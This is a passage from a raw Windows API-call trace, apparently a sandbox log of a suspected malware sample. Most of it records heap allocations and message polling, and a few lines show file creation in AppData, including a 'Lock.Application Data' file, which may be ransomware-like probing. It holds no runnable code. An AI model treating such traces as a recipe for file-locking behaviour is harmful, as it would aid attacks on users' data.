(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0208.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0208.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0208.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0208.195] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0208.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0208.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0208.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0208.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0208.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0208.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0208.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0208.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0208.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0208.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0208.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0208.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.199] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.199] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0208.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.199] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.199] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0208.200] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0208.200] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0208.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0208.201] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0208.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0208.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Application Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0208.202] GetLastError () returned 0x5 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.202] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0208.202] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0208.203] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.203] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local")) returned 0x2010 [0208.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0208.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.203] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Application Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.application data"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0 [0208.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0208.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.204] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.205] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0208.205] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.205] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: 